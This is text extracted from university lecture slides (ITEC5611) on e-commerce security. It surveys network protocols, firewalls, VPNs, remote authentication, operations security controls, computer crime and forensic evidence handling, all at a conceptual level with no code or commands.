• SSH-2 – Secure Shell version 2
– SSH has RSA Certificates
– Supports authentication, compression, confidentiality, and
integrity
– DES Encryption
– Because Secure Shell (SSH-2) supports authentication,
compression, confidentiality, and integrity, SSH is used
frequently for Encrypted File Transfer
• SSL – Secure Socket Layer
– Contains SSL record protocol and SSL Handshake Protocol
– Uses symmetric encryption and public key for authentication
– MAC – Message Authentication Code for Integrity
ITEC5611
S. Kungpisdan
108
Firewalls
• Packet Filtering Firewall - First Generation
–
–
–
–
–
Screening Router
Operates at Network and Transport level
Examines Source and Destination IP Address
Can deny based on ACLs
Can specify Port
• Application Level Firewall - Second Generation
–
–
–
–
–
Proxy Server
Copies each packet from one network to the other
Masks the origin of the data
Operates at layer 7 (Application Layer)
Reduces Network performance since it has do analyze each
packet and decide what to do with it.
– Also Called Application Layer Gateway
ITEC5611
S. Kungpisdan
109
Firewalls (cont.)
• Stateful Inspection Firewalls – Third Generation
– Packets Analyzed at all OSI layers
– Queued at the network level
– Faster than Application level Gateway
• Dynamic Packet Filtering Firewalls – Fourth
Generation
– Allows modification of security rules
– Mostly used for UDP
– Remembers all of the UDP packets that have crossed the
network’s perimeter, and it decides whether to enable packets to
pass through the firewall.
• Kernel Proxy – Fifth Generation
– Runs in NT Kernel
– Uses dynamic and custom TCP/IP-based stacks to inspect the
network packets and to enforce security policies.
ITEC5611
S. Kungpisdan
110
Demilitarized Zone (DMZ)
ITEC5611
S. Kungpisdan
111
Virtual Private Networks
• PPTP – Point-to-Point Tunneling Protocol
– Works at the Data Link Layer
– Single point to point connection from client to server
– Common with asynchronous connections with NT and Win 95
• L2TP - Layer 2 Tunneling Protocol
–
–
–
–
Combination of PPTP and earlier Layer 2 Forwarding Protocol (L2F)
Multiple protocols can be encapsulated within the L2TP
Single point to point connection from client to server
Common with Dial-up VPNs
• IPSec
–
–
–
–
Operates at the network layer
Allows multiple and simultaneous tunnels
Encrypt and authenticate IP data
Focuses more on Network to Network Connectivity
ITEC5611
S. Kungpisdan
112
Wireless Security
• WEP – Wired Equivalency Privacy – up to 128bit WEP
• WPA (Wireless Protected Access) is more
secure, recently WPA2
• WAP - Wireless Access Point
• SSID – Service Set Identifier – Network Name
– Disable SSID broadcast
• Use encryption, VPN, treat as external
connection, directional antenna
ITEC5611
S. Kungpisdan
113
Remote Node Security Protocols
• Password Authentication Protocol (PAP)
– Remote security protocol. Provides Identification and
Authentication.
– Uses static replayable password for authentication (now
considered weak)
– Does not encrypt the User ID or Password
• Challenge Handshake Protocol (CHAP)
–
–
–
–
–
Next evolution of PAP uses stronger authentication
Nonreplayable Challenge/Response
Verifies Identity of the node
Often used to enable network-to-network communication
Commonly used by remote access servers and xDSL, ISDN,
and cable modems
ITEC5611
S. Kungpisdan
114
Remote Access Authentication System
• TACACS – Terminal Access Controller Access
Control System (TCP)
• TACACS+ – includes the use of two factor
authentication
• RADIUS – Remote Access Dial-In User Service
(UDP)
ITEC5611
S. Kungpisdan
115
TACACS
• Terminal Access Controller Access Control System
• Provides remote authentication and related services
• User password administered in a central database rather
than in individual routers
• TACACS enabled network device prompts for user name
and static password
• TACACS enabled network device queries TACACA
server to verify password
• Does not support prompting for password change or use
of dynamic tokens
ITEC5611
S. Kungpisdan
116
TACACS+
• Terminal Access Controller Access Control
System Plus
• Proprietary CISCO enhancement
• Two factor Authentication
• User can change password
• Ability to use secure tokens
• Better Audit Trails
ITEC5611
S. Kungpisdan
117
RADIUS
•
•
•
•
Remote Access Dial-In User Service
Offers similar benefits to TACACS+
Often used as a stepping stone to TACACS+
Radius Server contains dynamic password and
network service access information (Network ACLS)
• Radius is a fully open protocol, can be customized for
almost any security system
• Can be used with Kerberos and provides CHAP remote
node authentication
• Except does not work with:
–
–
–
–
Apple Talk Remote Access Resolution Protocol
NetBios Frame Protocol Control Protocol
Netware Asynchronous Services Interface
X.25 PAD Connection
ITEC5611
S. Kungpisdan
118
Honeypots
•
Production systems (e.g., firewalls, routers, Web
servers, database servers) designed to do real
work but that are watched and studied as
network intrusions occur
ITEC5611
S. Kungpisdan
119
Layered Security
ITEC5611
S. Kungpisdan
120
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
121
Asset, Vulnerability, Threat
• Asset – anything that is a computer resource
(i.e. software data)
• Vulnerability – weakness in a system that
enables security to be violated (i.e. Weak
Segregation of duties)
• Threat – an event that could cause harm by
violating the security ( i.e. Operator abuse of
privileges)
ITEC5611
S. Kungpisdan
122
CIA
• Confidentiality – operations controls affect
confidentiality of data.
• Integrity – how well operations controls are
implemented affects data integrity
• Availability – fault tolerance and ability to
recover
ITEC5611
S. Kungpisdan
123
Controls and Protections
• Controls to protect hardware, software and
media from:
– Threats in an operating environment
– Internal and external intruders
– Operators inappropriately accessing
resources
ITEC5611
S. Kungpisdan
124
Categories of Controls
• Preventative – prevent harmful occurrence
– Lower amount and impact of errors entering the
system
– Prevent unauthorized intruders from accessing the
system
• Detective – detect after harmful occurrence
– Track unauthorized transactions
• Corrective – restore after harmful occurrence
– Data recovery
ITEC5611
S. Kungpisdan
125
Separation of Duties
• Assign different tasks to different personnel
• No single person can completely compromise a system
• Related to the concept of least privileges – least
privileges required to do one’s job
• Secure Systems - System Administrator and Security
Administrator must be different roles.
• Highly Secure Systems - System Administrator, Security
Administrator, and Enhanced Operator must be different
roles.
ITEC5611
S. Kungpisdan
126
System Administrator Functions
•
•
•
•
•
Installing software
Start up and shut down of system
Adding removing users
Performing back up and recovery
Handling printers and queues
ITEC5611
S. Kungpisdan
127
Security Administrator Functions
• Setting user clearances, initial passwords and
other security characteristics for new users
• Changing security profiles for users
• Setting file sensitivity labels
• Setting security of devices
• Renewing audit data
ITEC5611
S. Kungpisdan
128
Least Privilege
• No access beyond job requirements
• Group level privileges for Operators
– Read Only
– Read /Write - usually copies of original data
– Access Change – make changes to original
data
ITEC5611
S. Kungpisdan
129
Operation Controls
• Resource Protection
• Hardware Controls
• Software Controls
ITEC5611
S. Kungpisdan
130
Resource Protection
• Protecting Resources from disclosure
alteration or misuse
– Hardware – routers, firewalls, computers,
printers
– Software – libraries, vendor software, OS
software
– Data Resource – backup data, user data, logs
ITEC5611
S. Kungpisdan
131
Hardware Controls
• Hardware Maintenance
– Requires physical and logical access by support and vendors
– Supervision of vendors and maintenance, background checks
• Maintenance Accounts
– Disable maintenance accounts when not needed
– Rename default passwords
• Diagnostic Port Control
– Specific ports for maintenance
– Should be blocked from external access
• Hardware Physical Controls – require locks and alarms
–
–
–
–
Sensitive operator terminals
Media storage rooms
Server and communications equipment
Modem pools and circuit rooms
ITEC5611
S. Kungpisdan
132
Software Controls
• Anti-virus Management – prevent download of
viruses
• Software Testing – formal rigid software testing
process
• Software Utilities – control of powerful utilities
• Safe software Storage – prevent modification of
software and copies of backups
• Back up Controls – test and restore backups
ITEC5611
S. Kungpisdan
133
Physical Protection
• Protection from physical access
– Hardware – routers, firewalls, computers, printers
– Software – libraries, vendor software, OS software
• Physical piggybacking – following an
authorized person through a door
ITEC5611
S. Kungpisdan
134
Monitoring and Audits
• Monitoring – problem identification and
resolution
• Monitor for:
–
–
–
–
Illegal Software Installation
Hardware Faults
Error States
Operational Events
ITEC5611
S. Kungpisdan
135
Penetration Testing
• Testing a networks defenses by using the same
techniques as external intruders
–
–
–
–
–
Scanning and Probing – port scanners
Demon Dialing – war dialing for modems
Sniffing – capture data packets
Dumpster Diving – searching paper disposal areas
Social Engineering – most common, get information
by asking
ITEC5611
S. Kungpisdan
136
Auditing
• IT Auditors Audit:
– Backup Controls
– System and Transaction Controls
– Data Library Controls
– Systems Development Standards
– Data Center Security
– Contingency Plans
ITEC5611
S. Kungpisdan
137
Audit Trails
• Enables tracking of history of modifications,
deletions, additions.
• Allow for accountability
• Audit logs should record:
–
–
–
–
Transaction time and date
Who processed transaction
Which terminal was used
Various security events relating to transaction
ITEC5611
S. Kungpisdan
138
Illegal Computer Operations
• Eavesdropping – sniffing, dumpster diving,
social engineering
• Fraud – collusion, falsified transactions
• Theft – information or trade secrets, physical
hardware and software theft
• Sabotage – Denial of Service (DoS), production
delays
• External Attacks – malicious cracking, scanning,
war dialing
ITEC5611
S. Kungpisdan
139
Outline
• EC Architectural Framework
• EC Security
–
–
–
–
–
–
–
–
Basic Security Issues
Security Incidences
Attacking Web Applications
Access Controls
Securing EC Communications
Securing EC Networks
Operations Security
Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan
140
Computer Crimes
• Crimes against the computer
• Crimes using a computer
ITEC5611
S. Kungpisdan
141
Most Common Crimes
•
•
•
•
•
•
•
•
•
•
•
Denial of Service (DoS)
Theft or passwords
Network Intrusions
Emanation Eavesdropping
Social Engineering
Illegal Content of Material porn
Fraud – using computer to
perpetuate crimes, i.e.
auctions of non-existent
merchandise
Software Piracy
Dumpster Diving
Malicious Code
Spoofing of IP Addresses
• Information Warfare –
attacking infrastructure of a
Nation, including military and
power grid
• Destruction or alteration of
information
• Use of readily available Attack
Scripts – Script Kiddies,
unskilled users
• Masquerading
• Embezzlement – Illegally
acquiring funds
• Data-Diddling – modification of
data
• Terrorism
ITEC5611
S. Kungpisdan
142
Intellectual Property Law
• Patent – Provides owner legally enforceable right to
exclude others for specified time (U.S. 17 years)
• Copyright – Protects original works of authorship, can
be used for software and databases
• Trade Secret – Secures confidentiality of proprietary
technical and business related information
– Company must meet requirements:
•
•
•
•
Invested resources to develop the information
Valuable to the business
Valuable to competitor
Non-obvious information
• Trademark – establishes word, name, symbol, color or
sounds used to identify and distinguish goods
ITEC5611
S. Kungpisdan
143
Information Privacy Laws
• Intent varies widely from country to country
• European Union - has developed more
protective laws for individual privacy
– Transfer of data from EU to US is prohibited unless
equivalent protections are in place
ITEC5611
S. Kungpisdan
144
Electronic Monitoring
• Keystroke monitoring, e-mail monitoring,
surveillance cameras, badges and magnetic
card keys all allow monitoring of individuals.
• Key to monitoring: Must be done in a lawful
manner in a consistent fashion
ITEC5611
S. Kungpisdan
145
E-mail monitoring
• Inform users that all e-mail is being monitored
by displaying log-on banner
– Banner should state: logging on to system consents
user to being monitored. Unauthorized access is
prohibited. Subject to prosecution.
• Ensure monitoring is uniformly applied
• Explain acceptable use
• Explain who can read e-mail and how long it is
backed up
• No guarantee of privacy
ITEC5611
S. Kungpisdan
146
Computer Forensics
• Collecting information from and about computer
systems that is admissible in a court of law.
ITEC5611
S. Kungpisdan
147
Evidence Life Cycle
•
•
•
•
Discovery and recognition
Protection
Recording
Collection
–
–
–
–
Collect all relevant storage media
Make image of hard disk before removing power
Print out screen
Avoid degaussing equipment
• Identification (tagging and marking)
• Preservation
– Protect from magnetic erasure
– Store in proper environment
• Transportation
• Presentation in court
• Return to evidence owner
ITEC5611
S. Kungpisdan
148
Conducting the Investigation
• Corporate investigation should include Management,
corporate security, Human Resources, legal department
and other appropriate staff.
• Committee should be set up before hand to address the
following issues:
– Establishing liaison with law enforcement
– Deciding when and if to bring in law enforcement (FBI and
Secret Service)
– Setting up means of reporting computer crimes
– Establishing procedures for handling reports of computer crimes
– Planning and conducting investigations
– Involving senior management and corporate security, Human
Resources, the legal dept.
– Ensuring proper collection of evidence
ITEC5611
S. Kungpisdan
149
Good Sources of Evidence
•
•
•
•
•
•
•
•
Telephone records
Video cameras
Audit trails
System logs
System backups
Witnesses
Results of surveillance
E-mails
ITEC5611
S. Kungpisdan
150
MOM
• Motive
• Opportunity
• Means
ITEC5611
S. Kungpisdan
151
Interview
• If interviewing do not give information
away to suspect
• Questions should be scripted
• Don’t use original documents in the
interview
ITEC5611
S. Kungpisdan
152
Questions?